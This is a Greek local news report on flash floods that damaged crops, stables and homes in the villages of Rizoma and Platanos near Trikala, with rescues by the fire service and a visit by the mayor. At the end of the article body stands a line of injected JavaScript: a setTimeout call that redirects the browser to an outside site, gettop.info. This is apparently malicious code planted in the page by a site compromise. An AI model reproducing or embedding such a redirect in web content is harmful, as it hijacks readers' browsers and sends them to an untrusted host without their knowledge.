Καταστροφές σε καλλιέργειες και σπίτια στα Τρίκαλα (ΒΙΝΤΕΟ)

0
10

 

Όλα τα ρέματα είχαν φουσκώσει και υπερχειλίσει και όλοι οι δρόμοι έγιναn στην κυριολεξία ποτάμια καθώς οι κάτοικοι των χωριών Ριζώματος και Πλάτανου Τρικάλων αναφέρουν πως πρώτη φορά έζησαν τέτοια καταστροφή.

Τα νερά όπως κατέβαιναν ορμητικά από τις γύρω πλαγιές, περνούσαν μέσα από τις αυλές των σπιτιών και μέσα από τα σπίτια, μέσα από στάβλους, από οικόπεδα από γεωργικές εγκαταστάσεις, όπου μπορούσαν να βρουν δίοδο. Έντρομοι οι κάτοικοι έβλεπαν το σκηνικό και φυσικά ένιωθαν αδύναμοι να αντιμετωπίσουν τη θεομηνία.

Το ξεροπόταμο πριν από τον Πλάτανο είχε υπερχειλίσει και για πρώτη φορά το νερό περνούσε πάνω από τη γέφυρα, ενώ η κυκλοφορία φυσικά είχε διακοπεί. Δυνάμεις της Πυροσβεστικής Υπηρεσίας Τρικάλων και της Καλαμπάκας, απεγκλώβισαν δύο αυτοκίνητα με επιβάτες σε ρέμα της επαρχιακής οδού Ριζώματος-Σπαθάδων. Το ένα μάλιστα αυτοκίνητο είχε παρασυρθεί εκτός δρόμου από τα ορμητικά νερά, όπως γράφει το trikalaola.gr.

Σύμφωνα με τους κατοίκους του Ριζώματος, την καταστροφή προκάλεσε μπαζωμένο ρέμα ή δεν έχει γίνει η διευθέτηση του.

Ένας καπνοπαραγωγός στο Ρίζωμα έπαθε μεγάλη ζημιά, καθώς το ξηραντήριο πλημμύρισε και οι κόποι μιας χρονιάς πήγαν χαμένοι. Ο ίδιος διατηρούσε λίγες κότες και κουνέλια και μερικά από αυτά πνίγηκαν.

Μία οικογένεια αλβανικής καταγωγής μαζί με τα δυο μικρά παιδιά τους είδε να πλημμυρίζει το σπίτι που μένουν και απόψε αν δεν φιλοξενηθούν σε κάποιο άλλο σπίτι στο χωριό, ο δήμος θα μεριμνήσει να φιλοξενηθούν κάπου αλλού. Σταύλοι στον Πλάτανο πλημμύρισαν, χωρίς ωστόσο να πνιγούν ζώα, ενώ η νεροποντή προκάλεσε εκτεταμένες ζημιές σε μεγάλο μέρος του οδικού δικτύου του χωριού, όπως και στον Ρίζωμα.

Οι κάτοικοι περιγράφουν τη θεομηνία που έζησαν ως 2α παρουσία… καθώς κάτι ανάλογο δεν έχει συμβεί ποτέ στα χρονικά.

Σκαπτικό μηχάνημα του δήμου Τρικκαίων προσπαθούσε να σπάσει φράκτες και αναχώματα για να αποσυμφορηθούν τα οικόπεδα από τα νερά. Στα σημεία των ζημιών ήταν και ο δήμαρχος Τρικκαίων κ. Δημήτρης Παπαστεργίου μαζί με αντιδημάρχους. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here